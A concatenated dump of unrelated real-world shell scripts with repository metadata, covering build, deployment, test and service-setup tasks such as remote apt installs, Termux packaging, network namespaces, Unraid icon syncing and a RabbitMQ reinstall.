if [ -z "${PYSP_TEST_spark_master}" ] && [[ "$SPARK_SUBMIT_FLAGS" != *"--master"* ]]; then
export PYSP_TEST_spark_master="local[*,$SPARK_TASK_MAXFAILURES]"
fi
fi
if ((${#TEST_PARALLEL_OPTS[@]} > 0));
then
export PYSP_TEST_spark_rapids_memory_gpu_allocFraction=$MEMORY_FRACTION
export PYSP_TEST_spark_rapids_memory_gpu_maxAllocFraction=$MEMORY_FRACTION
# when running tests in parallel, we allocate less than the default minAllocFraction per test
# so we need to override this setting here
export PYSP_TEST_spark_rapids_memory_gpu_minAllocFraction=0
python "${RUN_TESTS_COMMAND[@]}" "${TEST_PARALLEL_OPTS[@]}" "${TEST_COMMON_OPTS[@]}"
else
"$SPARK_HOME"/bin/spark-submit --jars "${ALL_JARS// /,}" \
--driver-java-options "$PYSP_TEST_spark_driver_extraJavaOptions" \
$SPARK_SUBMIT_FLAGS "${RUN_TESTS_COMMAND[@]}" "${TEST_COMMON_OPTS[@]}"
fi
fi
| true
|
72fdc5e58ccc9270513eb94ba7c0c8d8d2caa30c
|
Shell
|
fvegaucr/slack
|
/fer_theconstructor/bin/remote_pack_deploy.sh
|
UTF-8
| 2,910
| 3.84375
| 4
|
[] |
no_license
|
#!/bin/bash
PACKAGE=$1
ACTION=$2
NOTIFY=$3
HOST=$4
CHECK_INSTALL='`ssh $HOST "whereis $PACKAGE | cut -d : -f2"`'
INSTALL=`ssh '$HOST' "sudo apt-get install $PACKAGE -y"`
REMOVE=`ssh $HOST "sudo apt-get remove $PACKAGE -y"`
REMINSTLOG="../var/remote_installer_sh.log"
FILE_APP="../files/index.php"
RESTART=`ssh $HOST "service $PACKAGE restart"`
if [ "$ACTION" == "install" ] ; then
echo "Starting Installation"
echo ' '`date -u`' -- "install" Option selected' >> $REMINSTLOG
if [ "$CHECK_INSTALL" == "" ]; then
if [ "$PACKAGE" == "apache2" ]; then
echo "Package $PACKAGE is not installed $HOST"
echo ''`date -u`' -- Package '$PACKAGE' is not installed '$HOST''
echo "Installing $PACKAGE in $HOST"
echo ''`date -u`' -- Installing '$PACKAGE' in '$HOST''
echo "========================================="
echo "$INSTALL"
`ssh $HOST "apt-get install -y libapache2-mod-php"`
echo "$PACKAGE has being installed in $HOST"
echo "Installing app"
`scp $FILE_APP $HOST:/var/www/html/`
`ls -la /var/www/html/`
sleep 2
echo "$RESTART"
else
echo "Package $PACKAGE is not installed $HOST"
echo ''`date -u`' -- Package '$PACKAGE' is not installed '$HOST''
echo "Installing $PACKAGE in $HOST"
echo ''`date -u`' -- Installing '$PACKAGE' in '$HOST''
echo "========================================="
echo "$INSTALL"
echo "$PACKAGE has being installed in $HOST"
fi
else
echo "Package $PACKAGE already install in $HOST"
REMOTEFILE=`ssh $HOST "ls /var/www/html | grep index.html"`
if [ "$REMOTEFILE" == "index.html" ] ; then
`scp $FILE_APP $HOST:/var/www/html/`
`ssh $HOST "rm -rf /var/www/html/index.html"`
echo "$RESTART"
fi
echo ''`date -u`' -- Package '$PACKAGE' already install in '$HOST''
exit 0
fi
elif [ "$ACTION" == "remove" ]; then
echo ' '`date -u`' -- "remove" Option selected' >> $REMINSTLOG
if [ "$CHECK_INSTALL" != "" ]; then
if [ "$PACKAGE" == "apache2" ] ; then
echo "Removing package $PACKAGE from $HOST"
echo ''`date -u`' -- Removing '$PACKAGE' from '$HOST''
echo "========================================="
echo $REMOVE
`ssh $HOST "rm -rf /var/www/html/*"`
echo $RESTART
echo "$PACKAGE removed from $HOST"
else
echo "Removing package $PACKAGE from $HOST"
echo ''`date -u`' -- Removing '$PACKAGE' from '$HOST''
echo "========================================="
echo $REMOVE
echo "$PACKAGE removed from $HOST"
fi
else
echo "Package $PACKAGE alredy uninstalled in $HOST"
echo ''`date -u`' -- Package '$PACKAGE' already uninstalled in '$HOST''
exit 0
fi
else
echo ' '`date -u`' -- "action" Option not Selected' >> $REMINSTLOG
echo '"action" Option not Selected'
echo 'Available Options "install/remove"'
exit 1
fi
| true
|
ebe463362caf30a7598a765a512d803c4f846203
|
Shell
|
timerzpro/termux-packages
|
/packages/git-crypt/build.sh
|
UTF-8
| 739
| 2.625
| 3
|
[
"Apache-2.0"
] |
permissive
|
TERMUX_PKG_HOMEPAGE=https://www.agwa.name/projects/git-crypt/
TERMUX_PKG_DESCRIPTION="git-crypt enables transparent encryption and decryption of files in a git repository."
TERMUX_PKG_LICENSE="GPL-3.0"
TERMUX_PKG_VERSION=0.6.0
TERMUX_PKG_MAINTAINER="@jottr"
TERMUX_PKG_SHA256=777c0c7aadbbc758b69aff1339ca61697011ef7b92f1d1ee9518a8ee7702bb78
TERMUX_PKG_SRCURL="https://github.com/AGWA/git-crypt/archive/${TERMUX_PKG_VERSION}.tar.gz"
TERMUX_PKG_EXTRA_CONFIGURE_ARGS=" -DCMAKE_BUILD_TYPE=Release -Dbuild_parse=yes -Dbuild_xmlparser=yes"
TERMUX_PKG_EXTRA_MAKE_ARGS="make ENABLE_MAN=yes"
TERMUX_PKG_DEPENDS="git, openssl"
termux_step_make() {
cd $TERMUX_PKG_SRCDIR
make
}
termux_step_make_install() {
cd $TERMUX_PKG_SRCDIR
make install
}
| true
|
72cfad1fabcdd0fce2176aa9f7bc5f13d9047b3a
|
Shell
|
nlamirault/kzenv
|
/libexec/kzenv-version-name
|
UTF-8
| 1,169
| 4
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Summary: Show the current Kustomize version
set -e
[ -n "${KZENV_DEBUG}" ] && set -x
source "${KZENV_ROOT}/libexec/helpers"
[ -d "${KZENV_ROOT}/versions" ] \
|| error_and_die "No versions of kustomize installed. Please install one with: kzenv install"
KZENV_VERSION_FILE="$(kzenv-version-file)"
KZENV_VERSION="$(cat "${KZENV_VERSION_FILE}" || true)"
if [[ "${KZENV_VERSION}" =~ ^latest.*$ ]]; then
[[ "${KZENV_VERSION}" =~ ^latest\:.*$ ]] && regex="${KZENV_VERSION##*\:}"
version="$(\ls "${KZENV_ROOT}/versions" \
| sort -t'.' -k 1nr,1 -k 2nr,2 -k 3nr,3 \
| grep -e "${regex}" \
| head -n 1
)"
[ -n "${version}" ] || error_and_die "No installed versions of kustomize matched '${KZENV_VERSION}'"
KZENV_VERSION="${version}"
fi
[ -z "${KZENV_VERSION}" ] \
&& error_and_die "Version could not be resolved (set by ${KZENV_VERSION_FILE} or kzenv use <version>)"
version_exists() {
local version="${1}"
[ -d "${KZENV_ROOT}/versions/${version}" ]
}
if version_exists "${KZENV_VERSION}"; then
echo "${KZENV_VERSION}"
else
error_and_die "version '${KZENV_VERSION}' is not installed (set by ${KZENV_VERSION_FILE})"
fi
| true
|
7c35076ea35268ac1e62652e6466016dadab434a
|
Shell
|
jqrsound/EYESY_OS_for_RasPiSound
|
/pisound-ctl/eyesy_launch.sh
|
UTF-8
| 692
| 3.109375
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# Copyright (C) 2017-2018 Vilniaus Blokas UAB, https://blokas.io/pisound
# All rights reserved.
#
# This software may be modified and distributed under the terms
# of the BSD license. See the LICENSE file for details.
#
systemctl start eyesy-python.service
systemctl start eyesy-web.service
systemctl start eyesy-web-socket.service
. /usr/local/pisound/scripts/common/start_puredata_eyesy.sh
PATCH="$1"
shift
echo
echo "$PATCH"
echo "$@"
(
# Connect the osc2midi bridge to the MIDI Inputs and to Pure Data.
sleep 4
/usr/local/pisound-ctl/connect_osc2midi.sh "pisound-ctl"
aconnect "pisound-ctl" "Pure Data";
aconnect -d "Pure Data:1" "pisound-ctl"
) &
start_puredata "$PATCH" $@ß
| true
|
33f263a4e815a8130b22a928886c4c49b57a794e
|
Shell
|
linktoakilan/wildflyapp
|
/entrypoint.sh
|
UTF-8
| 703
| 3.03125
| 3
|
[] |
no_license
|
#!/bin/bash
set -u # Fail on unset variables
set -e # Fail if any command fails
#get container IP from the container metadata
CONTAINER_IP=$(curl -s http://169.254.170.2/v2/metadata | jq -r .Containers[0].Networks[0].IPv4Addresses[0])
PORT_OFFSET=0
echo "Using Container IP: ${CONTAINER_IP}"
echo "Using Port Offset: ${PORT_OFFSET} "
#Bind Wildfly interfaces to the container IP. The port offset allows Wildfly interfaces to be started on different ports.
exec /opt/jboss/wildfly/bin/standalone.sh -c standalone-ha.xml -b ${CONTAINER_IP} -bmanagement ${CONTAINER_IP} -Djboss.node.name=node-${CONTAINER_IP} -Djboss.bind.address.private=${CONTAINER_IP} -Djboss.socket.binding.port-offset=${PORT_OFFSET}
| true
|
90fb712b06c98329b5c182e92a46087522cd5bc4
|
Shell
|
cirocosta/llb
|
/utils/setup-routing.sh
|
UTF-8
| 994
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
set -o errexit
set -o xtrace
main() {
case $1 in
setup)
setup
;;
clean)
clean
;;
*)
echo "Usage: ./setup-routing.sh (setup|clean)"
exit 1
;;
esac
}
clean() {
ip -all netns delete
ip link delete br1 || true
}
setup() {
ip netns add namespace1
ip netns add namespace2
ip link add veth1 type veth peer name br-veth1
ip link add veth2 type veth peer name br-veth2
ip link set veth1 netns namespace1
ip link set veth2 netns namespace2
ip netns exec namespace1 \
ip addr add 192.168.1.11/24 dev veth1
ip netns exec namespace2 \
ip addr add 192.168.1.12/24 dev veth2
ip link add name br1 type bridge
ip link set br1 up
ip link set br-veth1 up
ip link set br-veth2 up
ip netns exec namespace1 \
ip link set veth1 up
ip netns exec namespace2 \
ip link set veth2 up
ip link set br-veth1 master br1
ip link set br-veth2 master br1
ip addr add 192.168.1.10/24 brd + dev br1
}
main "$@"
| true
|
37734a3e96ae097872efb4d40f4d158f22f35be2
|
Shell
|
socal-ucr/djinn
|
/tonic-suite/img/scripts/ALL.sh
|
UTF-8
| 350
| 3.046875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
declare -a RTT
for DIR in {1..12}
do
mv ${DIR}_run 4_sem_results/
for FILE in {25..64..1}
do
tail -n 900 ${FILE}.out >> temp
OUTPUT="$(../${1}.py -i temp)"
rm temp
RTT[${FILE}]="${RTT[${FILE}]},${OUTPUT}"
done
cd ../
done
for i in {25..64}
do
echo "${RTT[${i}]}"
done
| true
|
3139009c235a675b2e381c84492ee4c905913a44
|
Shell
|
ulic75/unraid_vm_icons
|
/icon_download.sh
|
UTF-8
| 5,316
| 3.734375
| 4
|
[] |
no_license
|
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Download custom vm icons from github and add them to Unraid server # #
# # by - SpaceinvaderOne # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Variables - (other variables set in container template # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Directory for downloaded icons to be stored
DIR="/config/icons"
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # Functions # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Delete icon store if present and delete if set to yes in template
shall_i_delete() {
#check if icon store exists and delete it if clear icons flag is set
if [ -d $DIR ] && [ $delete == "yes" ]; then
rm -r $DIR
echo "I have deleted all vm icons ready to download fresh icons to sync"
echo "."
echo "."
else
#do nothing and continue of clear icons flag is not set
echo " Clear all icons not set......continuing."
fi
}
checkgit() {
# delete directory if previously run so can do fresh gitclone
if [ -d /config/unraid_vm_icons ] ; then
rm -r /config/unraid_vm_icons
fi
#run gitclone
git -C /config clone https://github.com/SpaceinvaderOne/unraid_vm_icons.git
}
# Create icon directory if not present then download selected icons. Skip if already done
downloadicons() {
if [ ! -d $DIR ] ; then
mkdir -vp $DIR
echo "I have created the icon store directory & now will start downloading selected icons"
checkgit
downloadstock
downloadwindows
downloadlinux
downloadfreebsd
downloadother
downloadmacos
echo "."
echo "."
echo "icons downloaded"
else
echo "."
echo "."
echo "Icons downloaded previously."
fi
}
# Sync icons in icon store to vm manager
syncicons() {
#make sure at least one file exists before trying to delete
touch /unraid_vm_icons/windowsxp.png
#delete all existing icons in vm manager
rm /unraid_vm_icons/*.*
#sync all icons selected to vm manager
rsync -a $DIR/ /unraid_vm_icons/
#reset permissions of appdata folder
chmod 777 -R /config/
#print message
echo "icons synced"
#play a tune if set
playtune
}
# Keep stock Unraid VM icons if set in template
downloadstock() {
if [ $stock == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Stock_Icons/ $DIR/
else
echo " unraid stock icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download windows based OS icons if set in template
downloadwindows() {
if [ $windows == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Windows/ $DIR/
else
echo " windows based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download linux based OS icons if set in template
downloadlinux() {
if [ $linux == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Linux/ $DIR/
else
echo " linux based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download freebsd based OS icons if set in template
downloadfreebsd() {
if [ $freebsd == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Freebsd/ $DIR/
else
echo " freebsd based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download other OS icons if set in template
downloadother() {
if [ $other == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/Other/ $DIR/
else
echo " other os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Download macOS based OS icons if set in template
downloadmacos() {
if [ $macos == "yes" ] ; then
rsync -a /config/unraid_vm_icons/icons/macOS/ $DIR/
else
echo " macos based os icons not wanted......continuing."
echo "."
echo "."
fi
}
# Play tune on sync through beep speaker
playtune() {
if [ $tune == "yes" ] ; then
beep -f 130 -l 100 -n -f 262 -l 100 -n -f 330 -l 100 -n -f 392 -l 100 -n -f 523 -l 100 -n -f 660 -l 100 -n -f 784 -l 300 -n -f 660 -l 300 -n -f 146 -l 100 -n -f 262 -l 100 -n -f 311 -l 100 -n -f 415 -l 100 -n -f 523 -l 100 -n -f 622 -l 100 -n -f 831 -l 300 -n -f 622 -l 300 -n -f 155 -l 100 -n -f 294 -l 100 -n -f 349 -l 100 -n -f 466 -l 100 -n -f 588 -l 100 -n -f 699 -l 100 -n -f 933 -l 300 -n -f 933 -l 100 -n -f 933 -l 100 -n -f 933 -l 100 -n -f 1047 -l 400
fi
}
# set time before exiting container
exit_time() {
if [ "$sleeptimehuman" == "30 seconds" ] ; then
sleeptime=30
fi
if [ "$sleeptimehuman" == "1 minute" ] ; then
sleeptime=60
fi
if [ "$sleeptimehuman" == "2 minutes" ] ; then
sleeptime=120
fi
if [ "$sleeptimehuman" == "5 minutes" ] ; then
sleeptime=300
fi
if [ "$sleeptimehuman" == "10 minutes" ] ; then
sleeptime=600
fi
sleep $sleeptime
}
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # run functions # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
shall_i_delete
downloadicons
syncicons
exit_time
| true
|
47bb147dea8251bca3d2a55028178e2e9a66951e
|
Shell
|
Huawei/DJ_Ansible
|
/scripts/project002/todo/executeTodo.sh
|
UTF-8
| 1,305
| 3.25
| 3
|
[] |
no_license
|
#!/bin/bash
# please modify USER、IP、PORT、USP4O
export API_USER=gatewayUser
export IP=""
export PORT="26335"
export USP4O="/yunwei/usp4o.jar"
TODO_TASK_NAME=$1
UUID_REG="\w{8}(-\w{4}){3}-\w{12}"
IPMC_USER="`stat -c '%U' $0`"
CURRENT_USER="`/usr/bin/id -u -n`"
if [[ "${IPMC_USER}" != "${CURRENT_USER}" ]]
then
echo "only ${IPMC_USER} can execute this script."
exit 1
fi
if [[ -z "${TODO_TASK_NAME}" ]]
then
echo "Todo task group name is empty, Please input todo task group name."
exit 1
fi
result=`su ossadm -c 'source /opt/oss/manager/bin/engr_profile.sh;$JAVA_HOME/bin/java -jar ${USP4O} ${IP} ${API_USER}'`
while read -r line
do
if [[ "$line" == "code:"* ]]
then
CODE=${line#code:}
continue
fi
if [[ "$line" == "passwd:"* ]]
then
PASSWORD=${line#passwd:}
continue
fi
done <<<"$result"
if [[ "$CODE" != "0000" ]]; then
echo "Query password from bastion host failed."
exit 1
fi
su ossadm -c "source /opt/oss/manager/bin/engr_profile.sh;python -c \"from executeTodoGroup import TodoExecutor;executor=TodoExecutor('${IP}','${PORT}','${API_USER}','${PASSWORD}');executor.execute_todo_group_by_name('${TODO_TASK_NAME}')\"" 2>/dev/null
if [[ $? -ne 0 ]]; then
echo "Execute todo task failed."
exit 1
fi
echo 0
| true
|
638910a136ec470a731398bc4c9819b7e2c4d9aa
|
Shell
|
tianbingsz/Paddle
|
/paddle/scripts/travis/build_and_test.sh
|
UTF-8
| 636
| 2.890625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
source ./common.sh
python -c 'import pip; print(pip.pep425tags.get_supported())'
if [[ "$TRAVIS_OS_NAME" == "osx" ]]; then
CMAKE_EXTRA="-DWITH_SWIG_PY=OFF"
else
CMAKE_EXTRA="-DWITH_SWIG_PY=ON"
fi
cmake .. -DWITH_GPU=OFF -DWITH_DOC=OFF -DWITH_TESTING=ON -DON_TRAVIS=ON -DON_COVERALLS=ON ${CMAKE_EXTRA}
NPROC=1
if [[ "$TRAVIS_OS_NAME" == "linux" ]]; then
NRPOC=`nproc`
make -j $NPROC
make coveralls
sudo make install
elif [[ "$TRAVIS_OS_NAME" == "osx" ]]; then
NPROC=`sysctl -n hw.ncpu`
make -j $NPROC
env CTEST_OUTPUT_ON_FAILURE=1 make test ARGS="-j $NPROC"
sudo make install
sudo paddle version
fi
| true
|
1995c3dab57b4d3b56469d5989111a371589f17b
|
Shell
|
chef/anka-buildkite-plugin
|
/tests/pre-command.bats
|
UTF-8
| 1,078
| 2.859375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bats
load '/usr/local/lib/bats/load.bash'
# Uncomment to enable stub debug output:
# export BUILDKITE_AGENT_STUB_DEBUG=/dev/tty
@test "Execute with PRE_COMMANDS (yaml list)" {
export BUILDKITE_PLUGIN_ANKA_PRE_COMMANDS="echo 123 && echo 456
echo got 123 && echo \" got 456 \"
buildkite-agent artifact download \"build.tar.gz\" . --step \":aws: Amazon Linux 1 Build\"
buildkite-agent artifact download \"build.tar.gz\" . --step \":aws: Amazon Linux 2 Build\""
stub buildkite-agent \
'artifact download "build.tar.gz" . --step ":aws: Amazon Linux 1 Build" : echo "downloaded artifact 1"' \
'artifact download "build.tar.gz" . --step ":aws: Amazon Linux 2 Build" : echo "downloaded artifact 2"'
run $PWD/hooks/pre-command
assert_success
assert_output --partial "123"
assert_output --partial "456"
assert_output --partial "got 123"
assert_output --partial " got 456"
assert_output --partial "downloaded artifact 1"
assert_output --partial "downloaded artifact 2"
unstub buildkite-agent
unset BUILDKITE_PLUGIN_ANKA_PRE_COMMANDS
}
| true
|
cff2cac3539723a5c7567b2f64d1863057e009e2
|
Shell
|
oldgcode/config
|
/zsh/precmd.zsh
|
UTF-8
| 3,667
| 4.03125
| 4
|
[] |
no_license
|
checkAndSetWindowTitle() {
local program_name="$1";
program_name=$(convertAliasToFull "$program_name");
# Set the window name to the currently running program.
if ! isShortName "$program_name"
then
setWindowTitle $(getTitleFromProgram "$program_name");
window_reset="yes"
fi
}
getTitleFromProgram() {
local program_name="$@";
local runningAsRoot="";
if [[ $program_name = ${program_name#sudo} ]] # || $program_name=${program_name#su} ]];
then
runningAsRoot=yes
fi
if __isroot
then
runningAsRoot=yes
fi
if [ -n $runningAsRoot ]; then
program_name="!$program_name"
fi
# Add an at mark at the beginning if running through ssh on a
# different computer.
if __inSSH; then
program_name="@$program_name"
# If tmux is running in SSH then display "@:hostname" as title
# in the term/outer screen.
if [[ $program_name == "@tmux" ]]; then
program_name="@:${HOST//.*/}"
# Use "@:!hostname" for root screens.
elif [[ $program_name == "@!tmux" ]]; then
program_name="@:!${HOST//.*/}"
fi
fi
echo $program_name;
}
# Change my shortcuts so the real name of the program is displayed.
convertAliasToFull() {
local text="$1"
# case $text in
# sgrep)
# text=grep
# ;;
# esac
echo "$text";
}
# Ignore often used commands which are only running for a very short
# time. This prevents a "blinking" look.
isShortName() {
[[ "$1" == (cd*|b|ls|la|ll|lls) ]] && return 0 ;
return 1;
}
# Create function per terminal. Don't check inside function for performance reasons
case "$TERM" in
screen*) # and tmux
setWindowTitle() {
print -n "\ek${(V)1}\e\\";
};;
xterm*)
setWindowTitle() {
print -n "\e]2;${(V)1}\e\\";
};;
*rxvt*)
setWindowTitle() {
print -n "\e]2;${(V)1}\e\\";
};;
Eterm*)
setWindowTitle() {
print -Pn "\e]2;$value\a\e[1;\a";
};;
*)
setWindowTitle() {
};;
esac
# precmd hook: restore the default "zsh - <cwd>" window title after a
# command that changed the title has finished.
function resetWindowTitle() {
    # Nothing to do unless a previous preexec hook flagged a change.
    if [[ -n $window_reset ]]; then
        setWindowTitle "zsh - $CWD"
        # Title handled; clear the flag until the next command.
        window_reset=""
    fi
}
#function changeTitlePreExec() {
# # The full command line comes in as "$1"
# local cmd="$1"
# local -a args
#
# args=${(z)tmpcmd}
#
# if [ "${args[1]}" = "fg" ] ; then
# local jobnum="${args[2]}"
# if [ -z "$jobnum" ] ; then
# # If no jobnum specified, find the current job.
# for i in ${(k)jobtexts}; do
# [ -z "${jobstates[$i]%%*:+:*}" ] && jobnum=$i
# done
# fi
# cmd="${jobtexts[${jobnum#%}]}"
# else
# fi
# title "$cmd"
#}
#function title() {
# # This is madness.
# # We replace literal '%' with '%%'
# # Also use ${(V) ...} to make nonvisible chars printable (think cat -v)
# # Replace newlines with '; '
# local value="${${${(V)1//\%/\%\%}//'\n'/; }//'\t'/ }"
# local location
#
# location="$HOST"
#
# # Special format for use with print -Pn
# value="%70>...>$value%<<"
# unset PROMPT_SUBST
# setopt LOCAL_OPTIONS
#}
# If ^C is pressed while typing a command, add it to the history so it can be
# easily retrieved later and then abort like ^C normally does. This is useful
# when I want to abort an command to do something in between and then finish
# typing the command.
# zsh calls TRAPINT on SIGINT; $1 is the signal number.
TRAPINT() {
    # Store the current buffer in the history (only when zle is active,
    # i.e. we are at an interactive prompt).
    zle && print -s -r -- $BUFFER

    # Return the default exit code so Zsh aborts the current command.
    return $1
}
autoload -Uz add-zsh-hook
# Register the hooks.  setCurrentPS1/setExecutionTimer are defined
# elsewhere in this configuration.
add-zsh-hook precmd setCurrentPS1
add-zsh-hook preexec setExecutionTimer
# Show the running command in the window title...
add-zsh-hook preexec checkAndSetWindowTitle
# ...and restore the default title once it finishes.
add-zsh-hook precmd resetWindowTitle
#add-zsh-hook preexec changeTitlePreExec
| true
|
381bf3da12e703ce29c7964864fad24bd4282644
|
Shell
|
atmaivancevic/2017
|
/iTOL/runPrintPopupInfo.sh
|
UTF-8
| 393
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Use this file to print popup HTML code for all genomes
# Takes as input a text file containing species names and NCBI txid number
# E.g. input txt file looks like:
#Macropus eugenii 9393
#Homo sapiens 9606
#...
# For each input line, run printPopupInfo.sh with the line's fields as
# separate arguments (the unquoted $line relies on word splitting so the
# genus, species and txid arrive as individual parameters) and append the
# generated HTML plus a "###" separator to htmlForPopup.txt.
while IFS= read -r line; do
    echo "reading input: $line"
    ./printPopupInfo.sh $line >> htmlForPopup.txt
    echo "###" >> htmlForPopup.txt
done < genomesAndTxidNos.txt
| true
|
f68d605afd018cc4ab47664af323415dac229955
|
Shell
|
Scott-Galloway/sg-setup
|
/admin_install.sh
|
UTF-8
| 906
| 3.21875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Scott Galloway environment setup for admin.
# Installs base admin tooling (curl, git, vim, screen, shellcheck) on
# Ubuntu, then the 32-bit/build prerequisites for the VMware CLI tools.
set -o errexit
set -o nounset
set -o pipefail
# set -o xtrace

# Distribution description, e.g. " Ubuntu 18.04 LTS"; used to gate the
# apt-based install path below.
ub_ver="$(lsb_release -d | awk -F: '{print $2}')"
#deb_ver="$(echo "$(uname -v)" | grep -i debian > /dev/null 2>&1;\
# echo $?)"
#cen_ver="$(echo "$(uname -v)" | grep -i centos > /dev/null 2>&1;\
# echo $?)"
#rhel_ver="$(echo "$(uname -v)" | grep -i enterprise > /dev/null\
# 2>&1; echo $?)"

if [[ "${ub_ver}" == *"Ubuntu"* ]]; then
  add-apt-repository ppa:git-core/ppa
  apt-get update
  apt-get -y install curl git vim screen shellcheck
else
  echo "Unknown distribution, fix and re-code."
  exit 1
fi

# TODO: unpack and install the VMware CLI tools here.
# Bug fix: the previous placeholder lines ("tar -xvf VMware CLI tools"
# and "install VMware CLI Tools") were not valid commands and, under
# errexit, aborted the script before the dependency install below ran.
sudo apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0:i386 gcc-multilib \
build-essential gcc uuid uuid-dev perl libssl-dev perl-doc liburi-perl \
libxml-libxml-perl libcrypt-ssleay-perl

exit 0
| true
|
387356e737b478691edbcbc2eb775c1d4536a2a3
|
Shell
|
Yusarin/K-VConsistency
|
/CausalMulticastRun.sh
|
UTF-8
| 851
| 2.875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Build the demo jar and launch $1 CausalMulticastDemo processes, each in
# its own terminal (Terminal.app on macOS, gnome-terminal elsewhere).
#   $1 - number of processes to start (ids 1..$1)
#   $2 - optional directory; process <id> writes its log to $2/<id>
gradle jar
for id in $(seq 1 "$1")
do
    echo "$id"
    # Quoted command substitutions: the old unquoted $(uname) inside
    # [ ... ] would break on unexpected output.
    echo "$(uname)"
    if [ "$(uname)" = "Darwin" ]; then
        if [ -n "$2" ]; then
            echo "$2/$id"
            osascript -e "tell application \"Terminal\" to do script \"cd $PWD && java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration $2/$id\""
        else
            osascript -e "tell application \"Terminal\" to do script \"cd $PWD && java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration\""
        fi
    else
        if [ -n "$2" ]; then
            echo "$2/$id"
            gnome-terminal --tab -x zsh -c "java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration $2/$id"
        else
            gnome-terminal --tab -x zsh -c "java -cp build/libs/CS425MP1.jar Process.CausalMulticastDemo $id CausalConfiguration"
        fi
    fi
done
| true
|
3f84449e5006dc2a5f5b1757572612ba0f5aed3e
|
Shell
|
maorfr/git-keeper
|
/repos.sh
|
UTF-8
| 706
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/bash
# Query app-interface (GraphQL) for every app's code components and print
# the unique set of repository URLs whose resource type is "upstream" or
# "saasrepo".  Requires APP_INTERFACE_USER / APP_INTERFACE_PASSWORD;
# APP_INTERFACE_URL defaults to the public endpoint.
[ -z "$APP_INTERFACE_USER" ] && echo "Please define APP_INTERFACE_USER env var" && exit 1
[ -z "$APP_INTERFACE_PASSWORD" ] && echo "Please define APP_INTERFACE_PASSWORD env var" && exit 1
# APP_INTERFACE_URL default value
[ -z "${APP_INTERFACE_URL}" ] && APP_INTERFACE_URL="https://app-interface.devshift.net/graphql"
QUERY='{"query":"{ apps_v1 { codeComponents { url, resource }}}"}'
# Fetch all code components, keep only upstream/saasrepo entries, and
# de-duplicate the URLs.
curl -s -H 'Content-Type: application/json' --user "${APP_INTERFACE_USER}:${APP_INTERFACE_PASSWORD}" --data-binary "$QUERY" "${APP_INTERFACE_URL}" | \
jq -r '.data.apps_v1[]|select(.codeComponents)|.codeComponents[]|select((.resource == "upstream") or (.resource == "saasrepo"))|.url' | \
sort -u
| true
|
9a16c8235e4089ee6a0a31c472cc4c4c1553fb14
|
Shell
|
zxt243416724/Openstack-HA-Deployment
|
/vm_install_rabbitmq_and_setting_native_cluster.sh
|
UTF-8
| 2,336
| 3.25
| 3
|
[] |
no_license
|
#!/usr/bin/bash
# Per-node step of the OpenStack HA deployment: completely remove any
# existing rabbitmq-server install, reinstall it bound to this node's
# internal IP, and regenerate the pacemaker OCF hook
# (set_rabbitmq_policy.sh) with queue mirroring and the "openstack"
# user baked in.
section=`hostname`
# This node's internal IP, read from cluster_variables.ini.
bind_ip=$(/usr/bin/bash readini.sh cluster_variables.ini $section int_ip)
master_vm_name=$(/usr/bin/bash readini.sh cluster_variables.ini default master)-vm
# NOTE(review): master_vm_ip is never used below — confirm it is needed.
master_vm_ip=$(/usr/bin/bash readini.sh cluster_variables.ini $master_vm_name int_ip)
#we delete rabbitmq-server-master and kill any rabbitmq process and uninstall it compeletely!
pcs resource delete rabbitmq-cluster --force
# Stop the service, then kill -9 any leftover rabbit processes.
service rabbitmq-server stop && ps -ef |grep rabbit|grep -v grep|awk '{print "kill -9",$2}'|sh
# Remove every file the package installed, erase it, then reinstall.
rpm -ql rabbitmq-server|awk '{printf("rm -rf %s\n",$1)}'|sh && yum erase -y rabbitmq-server
yum install -y rabbitmq-server
# NOTE: we need to bind the service to the internal IP address
cat > /etc/rabbitmq/rabbitmq-env.conf << EOF
NODE_IP_ADDRESS=$bind_ip
EOF
# required to generate the cookies at one node and copy it to other nodes
# if [ "$section" == "$master_vm_name" ]
# then
#	systemctl start rabbitmq-server
#	systemctl stop rabbitmq-server
# else
#	echo "this node donot generate cookie,so we donot start MQ manually"
#	systemctl stop rabbitmq-server
# fi
mkdir -p /var/lib/rabbitmq
chown -R rabbitmq:rabbitmq /var/lib/rabbitmq
#if install rabbitmq-server-3.6 and use rabbitmq-server-ha resource agent,pacemaker cluster will call /usr/lib/ocf/resource.d/rabbitmq/set_rabbitmq_policy.sh when cluster resurce start up,
#rabbitmq-server-3.6 will gernerate set_rabbitmq_policy.sh.example ,no set_rabbitmq_policy.sh
